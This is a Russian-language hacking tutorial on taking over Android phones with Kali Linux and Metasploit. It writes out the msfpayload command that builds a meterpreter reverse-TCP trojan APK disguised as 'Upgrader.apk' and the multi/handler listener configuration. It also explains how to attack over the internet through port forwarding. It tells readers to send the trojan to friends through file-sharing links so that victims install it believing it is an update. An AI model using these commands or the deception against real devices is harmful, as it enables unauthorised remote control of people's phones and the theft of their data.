Содержание:
Привет, хакеры! Добро пожаловать на наш сайт.
В этой статье мы расскажем, как взломать Android-телефон с помощью Kali. Мы не нашли ни одного туториала по использованию этого хака/эксплоита, поэтому и решили написать его сами. Возможно, вы уже о нем знаете.
Шаг 1. Запустите Кали
- Откройте терминал, и создайте файл Trojan.apk
- Вы можете сделать это, набрав: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените LHOST своим собственным IP-адресом)
- Вы также можете взломать Android через WAN, то есть через Interet, используя ваш общедоступный/внешний IP-адрес в параметре LHOST и пробросом портов (если вам не понятно, что такое «проброс портов» — напишите об этом комментарий).
Шаг 2. Откройте другой терминал
- Пока файл генерируется, откройте другой терминал.
- Загрузите консоль metasploit, набрав: msfconsole
Шаг 3. Установите «прослушивателя»
- После того, как msfconsole запустится (потребуется некоторое время) загрузите multi-handler эксплоит, набрав в консоли: use exploit/multi/handler
- Установите реверсивную полезную нагрузку, набрав: set payload android/meterpreter/reverse_tcp
- Чтобы установить тип L-хоста: установите LHOST 192.168.0.4 (Даже если вы взламываете WAN, указывайте здесь ваш частный/внутренний IP-адрес, а не публичный/внешний).
Шаг 4. Эксплуатируйте!
- Наконец, для запуска «прослушивателя» введите в консоли: exploit.
- Копируйте приложение, которое вы создали (Upgrader.apk) из корневой папки на ваш Android-телефон.
- Затем отправьте его в Dropbox или на любой файлообменник (например: www.speedyshare.com).
- Затем отправьте ссылку, которую этот сервис вам дал, вашим друзьям и эксплуатируйте их телефоны (только в локальной сети, но если вы использовали метод WAN, то вы можете использовать этот эксплоит из любого места в Интернете)
- Пусть жертва установит приложение Upgrader (поскольку он будет думать, что он предназначен для обновления некоторых функций на его телефоне).
- Однако в настройках безопасности Android-телефона опция разрешения на установку приложений из неизвестных источников должна быть включена, чтобы можно было установить ваш троянец.
- И когда он нажимает «Открыть» …
Шаг 5. БУМ!
Появляется вывод meterpreter:
——- ВЗЛОМАН ——
Конец
Обязательно приходите за добавкой!
Некоторые почтовые модули, которые работают для Windows, могут не работать в android
Например: run killav, persistence (бэкдор) и т.д.